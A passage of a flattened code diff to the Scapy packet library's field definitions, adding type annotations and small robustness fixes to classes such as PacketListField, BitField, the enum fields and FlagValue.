Packet_metaclass]] # noqa: E501 + count_from=None, # type: Optional[Callable[[BasePacket], int]] + length_from=None, # type: Optional[Callable[[BasePacket], int]] + next_cls_cb=None, # type: Optional[Callable[[BasePacket, List[BasePacket], Optional[BasePacket], bytes], Packet_metaclass]] # noqa: E501 + ): + # type: (...) -> None """ The number of Packet instances that are dissected by this field can be parametrized using one of three different mechanisms/parameters: @@ -1135,12 +1407,12 @@ def __init__(self, name, default, cls=None, count_from=None, length_from=None, n * count_from: a callback that returns the number of Packet instances to dissect. The callback prototype is:: - count_from(pkt:Packet) -> int + count_from(pkt:BasePacket) -> int * length_from: a callback that returns the number of bytes that must be dissected by this field. The callback prototype is:: - length_from(pkt:Packet) -> int + length_from(pkt:BasePacket) -> int * next_cls_cb: a callback that enables a Scapy developer to dynamically discover if another Packet instance should be @@ -1156,20 +1428,20 @@ def __init__(self, name, default, cls=None, count_from=None, length_from=None, n The type of the Packet instances that are dissected with this field is specified or discovered using one of the following mechanism: - * the cls parameter may contain a callable that returns an + * the pkt_cls parameter may contain a callable that returns an instance of the dissected Packet. This may either be a reference of a Packet subclass (e.g. DNSRROPT in layers/dns.py) to generate an homogeneous PacketListField or a function deciding the type of the Packet instance (e.g. _CDPGuessAddrRecord in contrib/cdp.py) - * the cls parameter may contain a class object with a defined + * the pkt_cls parameter may contain a class object with a defined ``dispatch_hook`` classmethod. That method must return a Packet instance. The ``dispatch_hook`` callmethod must implement the following prototype:: dispatch_hook(cls, - _pkt:Optional[Packet], + _pkt:Optional[BasePacket], *args, **kargs ) -> Packet_metaclass @@ -1192,7 +1464,7 @@ def __init__(self, name, default, cls=None, count_from=None, length_from=None, n previously parsed during the current ``PacketListField`` dissection, saved for the very last Packet instance. The cur argument contains a reference to that very last parsed - ``Packet`` instance. The remain argument contains the bytes + ``BasePacket`` instance. The remain argument contains the bytes that may still be consumed by the current PacketListField dissection operation. @@ -1208,8 +1480,8 @@ def __init__(self, name, default, cls=None, count_from=None, length_from=None, n continuation based on a look-ahead on the bytes to be dissected... - The cls and next_cls_cb parameters are semantically exclusive, - although one could specify both. If both are specified, cls is + The pkt_cls and next_cls_cb parameters are semantically exclusive, + although one could specify both. If both are specified, pkt_cls is silently ignored. The same is true for count_from and next_cls_cb. length_from and next_cls_cb are compatible and the dissection will @@ -1218,8 +1490,8 @@ def __init__(self, name, default, cls=None, count_from=None, length_from=None, n :param name: the name of the field :param default: the default value of this field; generally an empty Python list - @param cls: either a callable returning a Packet instance or a class - object defining a ``dispatch_hook`` class method + :param pkt_cls: either a callable returning a Packet instance or a + class object defining a ``dispatch_hook`` class method :param count_from: a callback returning the number of Packet instances to dissect. :param length_from: a callback returning the number of bytes to dissect @@ -1228,32 +1500,36 @@ def __init__(self, name, default, cls=None, count_from=None, length_from=None, n """ if default is None: default = [] # Create a new list for each instance - PacketField.__init__(self, name, default, cls) + super(PacketListField, self).__init__(name, default, pkt_cls) self.count_from = count_from self.length_from = length_from self.next_cls_cb = next_cls_cb def any2i(self, pkt, x): + # type: (Optional[BasePacket], Any) -> List[BasePacket] if not isinstance(x, list): return [x] else: return x - def i2count(self, pkt, val): + def i2count(self, + pkt, # type: BasePacket + val, # type: List[BasePacket] + ): + # type: (...) -> int if isinstance(val, list): return len(val) return 1 - def i2len(self, pkt, val): + def i2len(self, + pkt, # type: BasePacket + val, # type: List[BasePacket] + ): + # type: (...) -> int return sum(len(p) for p in val) - def do_copy(self, x): - if x is None: - return None - else: - return [p if isinstance(p, (str, bytes)) else p.copy() for p in x] - def getfield(self, pkt, s): + # type: (Optional[BasePacket], bytes) -> Tuple[bytes, List[BasePacket]] c = len_pkt = cls = None if self.length_from is not None: len_pkt = self.length_from(pkt) @@ -1265,7 +1541,7 @@ def getfield(self, pkt, s): if cls is None: c = 0 - lst = [] + lst = [] # type: BasePacket ret = b"" remain = s if len_pkt is not None: @@ -1301,34 +1577,49 @@ def getfield(self, pkt, s): return remain + ret, lst def addfield(self, pkt, s, val): + # type: (Optional[BasePacket], bytes, Any) -> bytes return s + b"".join(bytes_encode(v) for v in val) class StrFixedLenField(StrField): __slots__ = ["length_from"] - def __init__(self, name, default, length=None, length_from=None): - StrField.__init__(self, name, default) - self.length_from = length_from + def __init__( + self, + name, # type: str + default, # type: bytes + length=None, # type: Optional[int] + length_from=None, # type: Optional[Callable[[BasePacket], int]] + ): + # type: (...) -> None + super(StrFixedLenField, self).__init__(name, default) + self.length_from = length_from or (lambda x: 0) if length is not None: - self.length_from = lambda pkt, length=length: length + self.length_from = lambda x, length=length: length # type: ignore - def i2repr(self, pkt, v): + def i2repr(self, + pkt, # type: Optional[BasePacket] + v, # type: bytes + ): + # type: (...) -> str if isinstance(v, bytes): v = v.rstrip(b"\0") return super(StrFixedLenField, self).i2repr(pkt, v) def getfield(self, pkt, s): + # type: (BasePacket, bytes) -> Tuple[bytes, bytes] len_pkt = self.length_from(pkt) return s[len_pkt:], self.m2i(pkt, s[:len_pkt]) def addfield(self, pkt, s, val): + # type: (BasePacket, bytes, Optional[bytes]) -> bytes len_pkt = self.length_from(pkt) if len_pkt is None: return s + self.i2m(pkt, val) return s + struct.pack("%is" % len_pkt, self.i2m(pkt, val)) def randval(self): + # type: () -> RandBin try: len_pkt = self.length_from(None) except Exception: @@ -1339,53 +1630,83 @@ def randval(self): class StrFixedLenEnumField(StrFixedLenField): __slots__ = ["enum"] - def __init__(self, name, default, length=None, enum=None, length_from=None): # noqa: E501 + def __init__( + self, + name, # type: str + default, # type: bytes + length=None, # type: Optional[int] + enum=None, # type: Optional[Dict[str, str]] + length_from=None # type: Optional[Callable[[BasePacket], int]] + ): + # type: (...) -> None StrFixedLenField.__init__(self, name, default, length=length, length_from=length_from) # noqa: E501 self.enum = enum - def i2repr(self, pkt, v): - r = v.rstrip("\0" if isinstance(v, str) else b"\0") + def i2repr(self, pkt, w): + # type: (BasePacket, bytes) -> str + v = plain_str(w) + r = v.rstrip("\0") rr = repr(r) - if v in self.enum: - rr = "%s (%s)" % (rr, self.enum[v]) - elif r in self.enum: - rr = "%s (%s)" % (rr, self.enum[r]) + if self.enum: + if v in self.enum: + rr = "%s (%s)" % (rr, self.enum[v]) + elif r in self.enum: + rr = "%s (%s)" % (rr, self.enum[r]) return rr class NetBIOSNameField(StrFixedLenField): def __init__(self, name, default, length=31): + # type: (str, bytes, int) -> None StrFixedLenField.__init__(self, name, default, length) - def i2m(self, pkt, x): + def i2m(self, pkt, y): + # type: (Optional[BasePacket], Optional[bytes]) -> bytes len_pkt = self.length_from(pkt) // 2 - x = bytes_encode(x) - if x is None: - x = b"" + x = bytes_encode(y or b"") # type: bytes x += b" " * len_pkt x = x[:len_pkt] - x = b"".join(chb(0x41 + (orb(b) >> 4)) + chb(0x41 + (orb(b) & 0xf)) for b in x) # noqa: E501 - x = b" " + x - return x + x = b"".join( + chb(0x41 + (orb(b) >> 4)) + + chb(0x41 + (orb(b) & 0xf)) + for b in x + ) # noqa: E501 + return b" " + x def m2i(self, pkt, x): + # type: (Optional[BasePacket], bytes) -> bytes x = x.strip(b"\x00").strip(b" ") - return b"".join(map(lambda x, y: chb((((orb(x) - 1) & 0xf) << 4) + ((orb(y) - 1) & 0xf)), x[::2], x[1::2])) # noqa: E501 + return b"".join(map( + lambda x, y: chb( + (((orb(x) - 1) & 0xf) << 4) + ((orb(y) - 1) & 0xf) + ), + x[::2], x[1::2] + )) class StrLenField(StrField): __slots__ = ["length_from", "max_length"] - def __init__(self, name, default, fld=None, length_from=None, max_length=None): # noqa: E501 - StrField.__init__(self, name, default) + def __init__( + self, + name, # type: str + default, # type: bytes + fld=None, # type: Optional[str] + length_from=None, # type: Optional[Callable[[BasePacket], int]] + max_length=None, # type: Optional[Any] + ): + # type: (...) -> None + super(StrLenField, self).__init__(name, default) self.length_from = length_from self.max_length = max_length def getfield(self, pkt, s): - len_pkt = self.length_from(pkt) + # type: (Any, bytes) -> Tuple[bytes, bytes] + len_pkt = (self.length_from or (lambda x: 0))(pkt) return s[len_pkt:], self.m2i(pkt, s[:len_pkt]) def randval(self): + # type: () -> RandBin return RandBin(RandNum(0, self.max_length or 1200)) @@ -1395,6 +1716,7 @@ class XStrField(StrField): """ def i2repr(self, pkt, x): + # type: (Optional[BasePacket], bytes) -> str if x is None: return repr(x) return bytes_hex(x).decode() @@ -1402,9 +1724,12 @@ def i2repr(self, pkt, x): class _XStrLenField: def i2repr(self, pkt, x): + # type: (Optional[BasePacket], bytes) -> str if not x: return repr(x) - return bytes_hex(x[:self.length_from(pkt)]).decode() + return bytes_hex( + x[:(self.length_from or (lambda x: 0))(pkt)] # type: ignore + ).decode() class XStrLenField(_XStrLenField, StrLenField): @@ -1421,45 +1746,74 @@ class XStrFixedLenField(_XStrLenField, StrFixedLenField): class XLEStrLenField(XStrLenField): def i2m(self, pkt, x): + # type: (BasePacket, Optional[bytes]) -> bytes + if not x: + return b"" return x[:: -1] def m2i(self, pkt, x): + # type: (BasePacket, bytes) -> bytes return x[:: -1] class StrLenFieldUtf16(StrLenField): def h2i(self, pkt, x): + # type: (Optional[BasePacket], Optional[str]) -> bytes return plain_str(x).encode('utf-16')[2:] def any2i(self, pkt, x): + # type: (Optional[BasePacket], Any) -> bytes if isinstance(x, six.text_type): return self.h2i(pkt, x) return super(StrLenFieldUtf16, self).any2i(pkt, x) def i2repr(self, pkt, x): - return x - - def i2h(self, pkt, x): + # type: (Optional[BasePacket], bytes) -> str + return plain_str(x) + + def i2h(self, + pkt, # type: Optional[BasePacket] + x, # type: bytes + ): + # type: (...) -> str return bytes_encode(x).decode('utf-16') class BoundStrLenField(StrLenField): __slots__ = ["minlen", "maxlen"] - def __init__(self, name, default, minlen=0, maxlen=255, fld=None, length_from=None): # noqa: E501 + def __init__( + self, + name, # type: str + default, # type: bytes + minlen=0, # type: int + maxlen=255, # type: int + fld=None, # type: Optional[Field_metaclass] + length_from=None # type: Optional[Callable[[BasePacket], int]] + ): + # type: (...) -> None StrLenField.__init__(self, name, default, fld, length_from) self.minlen = minlen self.maxlen = maxlen def randval(self): + # type: () -> RandBin return RandBin(RandNum(self.minlen, self.maxlen)) -class FieldListField(Field): +class FieldListField(Field[List[Any], List[Any]]): __slots__ = ["field", "count_from", "length_from"] islist = 1 - def __init__(self, name, default, field, length_from=None, count_from=None): # noqa: E501 + def __init__( + self, + name, # type: str + default, # type: Optional[List[Field[Any, Any]]] + field, # type: Field_metaclass + length_from=None, # type: Optional[Callable[[BasePacket], int]] + count_from=None, # type: Optional[Callable[[BasePacket], int]] + ): + # type: (...) -> None if default is None: default = [] # Create a new list for each instance self.field = field @@ -1468,34 +1822,54 @@ def __init__(self, name, default, field, length_from=None, count_from=None): # self.length_from = length_from def i2count(self, pkt, val): + # type: (BasePacket, List[Any]) -> int if isinstance(val, list): return len(val) return 1 def i2len(self, pkt, val): + # type: (BasePacket, List[Any]) -> int return int(sum(self.field.i2len(pkt, v) for v in val)) - def i2m(self, pkt, val): + def i2m(self, + pkt, # type: BasePacket + val, # type: Optional[List[Any]] + ): + # type: (...) -> List[Any] if val is None: val = [] return val def any2i(self, pkt, x): + # type: (BasePacket, List[Any]) -> List[Any] if not isinstance(x, list): return [self.field.any2i(pkt, x)] else: return [self.field.any2i(pkt, e) for e in x] - def i2repr(self, pkt, x): + def i2repr(self, + pkt, # type: BasePacket + x, # type: List[Any] + ): + # type: (...) -> str return "[%s]" % ", ".join(self.field.i2repr(pkt, v) for v in x) - def addfield(self, pkt, s, val): + def addfield(self, + pkt, # type: BasePacket + s, # type: bytes + val, # type: Optional[List[Any]] + ): + # type: (...) -> bytes val = self.i2m(pkt, val) for v in val: s = self.field.addfield(pkt, s, v) return s - def getfield(self, pkt, s): + def getfield(self, + pkt, # type: BasePacket + s, # type: bytes + ): + # type: (...) -> Any c = len_pkt = None if self.length_from is not None: len_pkt = self.length_from(pkt) @@ -1517,10 +1891,20 @@ def getfield(self, pkt, s): return s + ret, val -class FieldLenField(Field): +class FieldLenField(Field[int, int]): __slots__ = ["length_of", "count_of", "adjust"] - def __init__(self, name, default, length_of=None, fmt="H", count_of=None, adjust=lambda pkt, x: x, fld=None): # noqa: E501 + def __init__( + self, + name, # type: str + default, # type: Optional[Any] + length_of=None, # type: Optional[str] + fmt="H", # type: str + count_of=None, # type: Optional[str] + adjust=lambda pkt, x: x, # type: Callable[[BasePacket, int], int] + fld=None, # type: Optional[Any] + ): + # type: (...) -> None Field.__init__(self, name, default, fmt) self.length_of = length_of self.count_of = count_of @@ -1530,6 +1914,7 @@ def __init__(self, name, default, length_of=None, fmt="H", count_of=None, adjust self.length_of = fld def i2m(self, pkt, x): + # type: (BasePacket, Optional[int]) -> int if x is None: if self.length_of is not None: fld, fval = pkt.getfield_and_val(self.length_of) @@ -1543,9 +1928,14 @@ def i2m(self, pkt, x): class StrNullField(StrField): def addfield(self, pkt, s, val): + # type: (BasePacket, bytes, Optional[bytes]) -> bytes return s + self.i2m(pkt, val) + b"\x00" - def getfield(self, pkt, s): + def getfield(self, + pkt, # type: BasePacket + s, # type: bytes + ): + # type: (...) -> Tuple[bytes, bytes] len_str = s.find(b"\x00") if len_str < 0: # \x00 not found: return empty @@ -1553,6 +1943,7 @@ def getfield(self, pkt, s): return s[len_str + 1:], self.m2i(pkt, s[:len_str]) def randval(self): + # type: () -> RandTermString return RandTermString(RandNum(0, 1200), b"\x00") @@ -1560,11 +1951,13 @@ class StrStopField(StrField): __slots__ = ["stop", "additional"] def __init__(self, name, default, stop, additional=0): + # type: (str, str, bytes, int) -> None Field.__init__(self, name, default) self.stop = stop self.additional = additional def getfield(self, pkt, s): + # type: (Optional[BasePacket], bytes) -> Tuple[bytes, bytes] len_str = s.find(self.stop) if len_str < 0: return b"", s @@ -1573,34 +1966,44 @@ def getfield(self, pkt, s): return s[len_str:], s[:len_str] def randval(self): + # type: () -> RandTermString return RandTermString(RandNum(0, 1200), self.stop) -class LenField(Field): +class LenField(Field[int, int]): """ If None, will be filled with the size of the payload """ __slots__ = ["adjust"] def __init__(self, name, default, fmt="H", adjust=lambda x: x): + # type: (str, Optional[Any], str, Callable[[int], int]) -> None Field.__init__(self, name, default, fmt) self.adjust = adjust - def i2m(self, pkt, x): + def i2m(self, + pkt, # type: BasePacket + x, # type: Optional[int] + ): + # type: (...) -> int if x is None: x = self.adjust(len(pkt.payload)) return x -class BCDFloatField(Field): +class BCDFloatField(Field[float, int]): def i2m(self, pkt, x): + # type: (Optional[BasePacket], Optional[float]) -> int + if x is None: + return 0 return int(256 * x) def m2i(self, pkt, x): + # type: (Optional[BasePacket], int) -> float return x / 256.0 -class BitField(Field): +class _BitField(Field[I, int]): """ Field to handle bits. @@ -1650,6 +2053,7 @@ class TestPacket(Packet): def __init__(self, name, default, size, tot_size=0, end_tot_size=0): + # type: (str, I, int, int, int) -> None Field.__init__(self, name, default) self.rev = size < 0 or tot_size < 0 or end_tot_size < 0 self.size = abs(size) @@ -1659,10 +2063,19 @@ def __init__(self, name, default, size, if not end_tot_size: end_tot_size = self.size // 8 self.end_tot_size = abs(end_tot_size) - self.sz = self.size / 8. - - def addfield(self, pkt, s, val): - val = self.i2m(pkt, val) + # Fields always have a round sz except BitField + # so to keep it simple, we'll ignore it here. + self.sz = self.size / 8. # type: ignore + + # We need to # type: ignore a few things because of how special + # BitField is + def addfield(self, # type: ignore + pkt, # type: BasePacket + s, # type: Union[Tuple[bytes, int, int], bytes] + ival, # type: I + ): + # type: (...) -> Union[Tuple[bytes, int, int], bytes] + val = self.i2m(pkt, ival) if isinstance(s, tuple): s, bitsdone, v = s else: @@ -1683,7 +2096,11 @@ def addfield(self, pkt, s, val): s = s[:-self.end_tot_size] + s[-self.end_tot_size:][::-1] return s - def getfield(self, pkt, s): + def getfield(self, # type: ignore + pkt, # type: BasePacket + s, # type: Union[Tuple[bytes, int], bytes] + ): + # type: (...) -> Union[Tuple[Tuple[bytes, int], I], Tuple[bytes, I]] # noqa: E501 if isinstance(s, tuple): s, bn = s else: @@ -1712,19 +2129,25 @@ def getfield(self, pkt, s): bn += self.size s = s[bn // 8:] bn = bn % 8 - b = self.m2i(pkt, b) + b2 = self.m2i(pkt, b) if bn: - return (s, bn), b + return (s, bn), b2 else: - return s, b + return s, b2 def randval(self): + # type: () -> RandNum return RandNum(0, 2**self.size - 1) - def i2len(self, pkt, x): + def i2len(self, pkt, x): # type: ignore + # type: (Optional[BasePacket], Optional[float]) -> float return float(self.size) / 8 +class BitField(_BitField[int]): + __doc__ = _BitField.__doc__ + + class BitFixedLenField(BitField): __slots__ = ["length_from"] @@ -1744,23 +2167,43 @@ def addfield(self, pkt, s, val): class BitFieldLenField(BitField): __slots__ = ["length_of", "count_of", "adjust"] - def __init__(self, name, default, size, length_of=None, count_of=None, adjust=lambda pkt, x: x): # noqa: E501 - BitField.__init__(self, name, default, size) + def __init__(self, + name, # type: str + default, # type: int + size, # type: int + length_of=None, # type: Optional[Union[Callable[[Optional[BasePacket]], int], str]] # noqa: E501 + count_of=None, # type: Optional[str] + adjust=lambda pkt, x: x, # type: Callable[[Optional[BasePacket], int], int] # noqa: E501 + ): + # type: (...) -> None + super(BitFieldLenField, self).__init__(name, default, size) self.length_of = length_of self.count_of = count_of self.adjust = adjust def i2m(self, pkt, x): - return (FieldLenField.i2m.__func__ if six.PY2 else FieldLenField.i2m)(self, pkt, x) # noqa: E501 + # type: (Optional[BasePacket], Optional[Any]) -> int + if six.PY2: + func = FieldLenField.i2m.__func__ + else: + func = FieldLenField.i2m + return func(self, pkt, x) # type: ignore class XBitField(BitField): def i2repr(self, pkt, x): - return lhex(self.i2h(pkt, x)) - - -class _EnumField(Field): - def __init__(self, name, default, enum, fmt="H"): + # type: (Optional[BasePacket], int) -> str + return lhex(self.i2h(pkt, x)) # type: ignore + + +class _EnumField(Field[Union[List[I], I], I]): + def __init__(self, + name, # type: str + default, # type: Optional[I] + enum, # type: Union[Dict[I, str], List[str], DADict, Tuple[Callable[[I], str], Callable[[str], I]]] # noqa: E501 + fmt="H", # type: str + ): + # type: (...) -> None """ Initializes enum fields. @param name: name of this field @@ -1780,10 +2223,10 @@ def __init__(self, name, default, enum, fmt="H"): enum.observe(self) if isinstance(enum, tuple): - self.i2s_cb = enum[0] - self.s2i_cb = enum[1] - self.i2s = None - self.s2i = None + self.i2s_cb = enum[0] # type: Optional[Callable[[I], str]] + self.s2i_cb = enum[1] # type: Optional[Callable[[str], I]] + self.i2s = None # type: Optional[Dict[I, str]] + self.s2i = None # type: Optional[Dict[str, I]] else: i2s = self.i2s = {} s2i = self.s2i = {} @@ -1796,62 +2239,84 @@ def __init__(self, name, default, enum, fmt="H"): else: keys = list(enum) if any(isinstance(x, str) for x in keys): - i2s, s2i = s2i, i2s + i2s, s2i = s2i, i2s # type: ignore for k in keys: i2s[k] = enum[k] s2i[enum[k]] = k Field.__init__(self, name, default, fmt) def any2i_one(self, pkt, x): + # type: (Optional[BasePacket], Any) -> I if isinstance(x, str): - try: - x = self.s2i[x] - except TypeError: + if self.s2i: + try: + x = self.s2i[x] + except KeyError: + pass + elif self.s2i_cb: x = self.s2i_cb(x) - return x + return cast(I, x) def i2repr_one(self, pkt, x): + # type: (Optional[BasePacket], I) -> str if self not in conf.noenum and not isinstance(x, VolatileValue): - try: - return self.i2s[x] - except KeyError: - pass - except TypeError: + if self.i2s: + try: + return self.i2s[x] + except KeyError: + pass + elif self.i2s_cb: ret = self.i2s_cb(x) if ret is not None: return ret return repr(x) def any2i(self, pkt, x): + # type: (BasePacket, Any) -> Union[I, List[I]] if isinstance(x, list): return [self.any2i_one(pkt, z) for z in x] else: return self.any2i_one(pkt, x) - def i2repr(self, pkt, x): + def i2repr(self, pkt, x): # type: ignore + # type: (Optional[BasePacket], Any) -> Union[List[str], str] if isinstance(x, list): return [self.i2repr_one(pkt, z) for z in x] else: return self.i2repr_one(pkt, x) def notify_set(self, enum, key, value): - log_runtime.debug("At %s: Change to %s at 0x%x" % (self, value, key)) - self.i2s[key] = value - self.s2i[value] = key + # type: (ObservableDict, I, str) -> None + ks = "0x%x" if isinstance(key, int) else "%s" + log_runtime.debug( + ("At %s: Change to %s at " + ks) % (self, value, key) + ) + if self.i2s and self.s2i: + self.i2s[key] = value + self.s2i[value] = key def notify_del(self, enum, key): - log_runtime.debug("At %s: Delete value at 0x%x" % (self, key)) - value = self.i2s[key] - del self.i2s[key] - del self.s2i[value] + # type: (ObservableDict, I) -> None + ks = "0x%x" if isinstance(key, int) else "%s" + log_runtime.debug(("At %s: Delete value at " + ks) % (self, key)) + if self.i2s and self.s2i: + value = self.i2s[key] + del self.i2s[key] + del self.s2i[value] -class EnumField(_EnumField): +class EnumField(_EnumField[I]): __slots__ = ["i2s", "s2i", "s2i_cb", "i2s_cb"] -class CharEnumField(EnumField): - def __init__(self, name, default, enum, fmt="1s"): +class CharEnumField(EnumField[str]): + def __init__(self, + name, # type: str + default, # type: str + enum, # type: Union[Dict[str, str], Tuple[Callable[[BasePacket], str], ...]] # noqa: E501 + fmt="1s", # type: str + ): + # type: (...) -> None EnumField.__init__(self, name, default, enum, fmt) if self.i2s is not None: k = list(self.i2s) @@ -1859,105 +2324,135 @@ def __init__(self, name, default, enum, fmt="1s"): self.i2s, self.s2i = self.s2i, self.i2s def any2i_one(self, pkt, x): + # type: (Optional[BasePacket], str) -> str if len(x) != 1: - if self.s2i is None: - x = self.s2i_cb(x) - else: + if self.s2i: x = self.s2i[x] + elif self.s2i_cb: + x = self.s2i_cb(x) return x -class BitEnumField(BitField, _EnumField): +class BitEnumField(_BitField[Union[List[int], int]], _EnumField[int]): __slots__ = EnumField.__slots__ def __init__(self, name, default, size, enum): + # type: (str, Optional[int], int, Dict[int, str]) -> None _EnumField.__init__(self, name, default, enum) self.rev = size < 0 self.size = abs(size) - self.sz = self.size / 8. + self.sz = self.size / 8. # type: ignore def any2i(self, pkt, x): + # type: (BasePacket, Any) -> Union[List[int], int] return _EnumField.any2i(self, pkt, x) - def i2repr(self, pkt, x): + def i2repr(self, + pkt, # type: Optional[BasePacket] + x, # type: Union[List[int], int] + ): + # type: (...) -> Any return _EnumField.i2repr(self, pkt, x) -class ShortEnumField(EnumField): +class ShortEnumField(EnumField[int]): __slots__ = EnumField.__slots__ - def __init__(self, name, default, enum): + def __init__(self, + name, # type: str + default, # type: int + enum, # type: Union[Dict[int, str], Tuple[Callable[[BasePacket], int], ...], DADict] # noqa: E501 + ): + # type: (...) -> None EnumField.__init__(self, name, default, enum, "H") -class LEShortEnumField(EnumField): +class LEShortEnumField(EnumField[int]): def __init__(self, name, default, enum): + # type: (str, int, Union[Dict[int, str], List[str]]) -> None EnumField.__init__(self, name, default, enum, " None EnumField.__init__(self, name, default, enum, "B") class XByteEnumField(ByteEnumField): def i2repr_one(self, pkt, x): + # type: (Optional[BasePacket], int) -> str if self not in conf.noenum and not isinstance(x, VolatileValue): - try: - return self.i2s[x] - except KeyError: - pass - except TypeError: + if self.i2s: + try: + return self.i2s[x] + except KeyError: + pass + elif self.i2s_cb: ret = self.i2s_cb(x) if ret is not None: return ret - return lhex(x) + return lhex(x) # type: ignore -class IntEnumField(EnumField): +class IntEnumField(EnumField[int]): def __init__(self, name, default, enum): + # type: (str, Optional[int], Dict[int, str]) -> None EnumField.__init__(self, name, default, enum, "I") -class SignedIntEnumField(EnumField): +class SignedIntEnumField(EnumField[int]): def __init__(self, name, default, enum): + # type: (str, Optional[int], Dict[int, str]) -> None EnumField.__init__(self, name, default, enum, "i") -class LEIntEnumField(EnumField): +class LEIntEnumField(EnumField[int]): def __init__(self, name, default, enum): + # type: (str, int, Dict[int, str]) -> None EnumField.__init__(self, name, default, enum, " str if self not in conf.noenum and not isinstance(x, VolatileValue): - try: - return self.i2s[x] - except KeyError: - pass - except TypeError: + if self.i2s is not None: + try: + return self.i2s[x] + except KeyError: + pass + elif self.i2s_cb: ret = self.i2s_cb(x) if ret is not None: return ret - return lhex(x) + return lhex(x) # type: ignore -class _MultiEnumField(_EnumField): - def __init__(self, name, default, enum, depends_on, fmt="H"): +class _MultiEnumField(_EnumField[I]): + def __init__(self, + name, # type: str + default, # type: int + enum, # type: Dict[I, Dict[I, str]] + depends_on, # type: Callable[[BasePacket], I] + fmt="H" # type: str + ): + # type: (...) -> None self.depends_on = depends_on self.i2s_multi = enum - self.s2i_multi = {} - self.s2i_all = {} + self.s2i_multi = {} # type: Dict[I, Dict[str, I]] + self.s2i_all = {} # type: Dict[str, I] for m in enum: - self.s2i_multi[m] = s2i = {} + s2i = {} # type: Dict[str, I] + self.s2i_multi[m] = s2i for k, v in six.iteritems(enum[m]): s2i[v] = k self.s2i_all[v] = k Field.__init__(self, name, default, fmt) def any2i_one(self, pkt, x): + # type: (BasePacket, Any) -> I if isinstance(x, str): v = self.depends_on(pkt) if v in self.s2i_multi: @@ -1965,34 +2460,50 @@ def any2i_one(self, pkt, x): if x in s2i: return s2i[x] return self.s2i_all[x] - return x + return cast(I, x) def i2repr_one(self, pkt, x): + # type: (BasePacket, I) -> str v = self.depends_on(pkt) if isinstance(v, VolatileValue): return repr(v) if v in self.i2s_multi: - return self.i2s_multi[v].get(x, x) - return x + return str(self.i2s_multi[v].get(x, x)) + return str(x) -class MultiEnumField(_MultiEnumField, EnumField): +class MultiEnumField(_MultiEnumField[int], EnumField[int]): __slots__ = ["depends_on", "i2s_multi", "s2i_multi", "s2i_all"] -class BitMultiEnumField(BitField, _MultiEnumField): +class BitMultiEnumField(_BitField[Union[List[int], int]], + _MultiEnumField[int]): __slots__ = EnumField.__slots__ + MultiEnumField.__slots__ - def __init__(self, name, default, size, enum, depends_on): + def __init__( + self, + name, # type: str + default, # type: int + size, # type: int + enum, # type: Dict[int, Dict[int, str]] + depends_on # type: Callable[[BasePacket], int] + ): + # type: (...) -> None _MultiEnumField.__init__(self, name, default, enum, depends_on) self.rev = size < 0 self.size = abs(size) - self.sz = self.size / 8. + self.sz = self.size / 8. # type: ignore def any2i(self, pkt, x): + # type: (Optional[BasePacket], Any) -> Union[List[int], int] return _MultiEnumField.any2i(self, pkt, x) - def i2repr(self, pkt, x): + def i2repr( # type: ignore + self, + pkt, # type: Optional[BasePacket] + x # type: Union[List[int], int] + ): + # type: (...) -> Union[str, List[str]] return _MultiEnumField.i2repr(self, pkt, x) @@ -2000,6 +2511,7 @@ class ByteEnumKeysField(ByteEnumField): """ByteEnumField that picks valid values when fuzzed. """ def randval(self): + # type: () -> RandEnumKeys return RandEnumKeys(self.i2s) @@ -2007,6 +2519,7 @@ class ShortEnumKeysField(ShortEnumField): """ShortEnumField that picks valid values when fuzzed. """ def randval(self): + # type: () -> RandEnumKeys return RandEnumKeys(self.i2s) @@ -2014,6 +2527,7 @@ class IntEnumKeysField(IntEnumField): """IntEnumField that picks valid values when fuzzed. """ def randval(self): + # type: () -> RandEnumKeys return RandEnumKeys(self.i2s) @@ -2021,22 +2535,35 @@ def randval(self): class LEFieldLenField(FieldLenField): - def __init__(self, name, default, length_of=None, fmt=" None FieldLenField.__init__(self, name, default, length_of=length_of, fmt=fmt, count_of=count_of, fld=fld, adjust=adjust) # noqa: E501 class FlagValueIter(object): - slots = ["flagvalue", "cursor"] + __slots__ = ["flagvalue", "cursor"] def __init__(self, flagvalue): + # type: (FlagValue) -> None self.flagvalue = flagvalue self.cursor = 0 def __iter__(self): + # type: () -> FlagValueIter return self def __next__(self): + # type: () -> str x = int(self.flagvalue) x >>= self.cursor while x: @@ -2053,6 +2580,7 @@ class FlagValue(object): __slots__ = ["value", "names", "multi"] def _fixvalue(self, value): + # type: (Any) -> int if not value: return 0 if isinstance(value, six.string_types): @@ -2065,53 +2593,68 @@ def _fixvalue(self, value): return int(value) def __init__(self, value, names): + # type: (Union[List[str], int, str], Union[List[str], str]) -> None self.multi = isinstance(names, list) self.names = names self.value = self._fixvalue(value) def __hash__(self): + # type: () -> int return hash(self.value) def __int__(self): + # type: () -> int return self.value def __eq__(self, other): + # type: (Any) -> bool return self.value == self._fixvalue(other) def __lt__(self, other): + # type: (Any) -> bool return self.value < self._fixvalue(other) def __le__(self, other): + # type: (Any) -> bool return self.value <= self._fixvalue(other) def __gt__(self, other): + # type: (Any) -> bool return self.value > self._fixvalue(other) def __ge__(self, other): + # type: (Any) -> bool return self.value >= self._fixvalue(other) def __ne__(self, other): + # type: (Any) -> bool return self.value != self._fixvalue(other) def __and__(self, other): + # type: (int) -> FlagValue return self.__class__(self.value & self._fixvalue(other), self.names) __rand__ = __and__ def __or__(self, other): + # type: (int) -> FlagValue return self.__class__(self.value | self._fixvalue(other), self.names) __ror__ = __or__ def __lshift__(self, other): + # type: (int) -> int return self.value << self._fixvalue(other) def __rshift__(self, other): + # type: (int) -> int return self.value >> self._fixvalue(other) def __nonzero__(self): + # type: () -> bool return bool(self.value) __bool__ = __nonzero__ def flagrepr(self): + # type: () -> str warnings.warn( "obj.flagrepr() is obsolete. Use str(obj) instead.", DeprecationWarning @@ -2119,6 +2662,7 @@ def flagrepr(self): return str(self) def __str__(self): + # type: () -> str i = 0 r = [] x = int(self) @@ -2134,17 +2678,21 @@ def __str__(self): return ("+" if self.multi else "").join(r) def __iter__(self): + # type: () -> FlagValueIter return FlagValueIter(self) def __repr__(self): + # type: () -> str return "" % (self, self) def __deepcopy__(self, memo): + # type: (Dict[Any, Any]) -> FlagValue return self.__class__(int(self), self.names) def __getattr__(self, attr): + # type: (str) -> Any if attr in self.__slots__: - return super(FlagValue, self).__getattr__(attr) + return super(FlagValue, self).__getattribute__(attr) try: if self.multi: return bool((2 ** self.names.index(attr)) & int(self)) @@ -2156,9 +2704,10 @@ def __getattr__(self, attr): return self.__getattr__(attr.replace('_', '-')) except AttributeError: pass - return super(FlagValue, self).__getattr__(attr) + 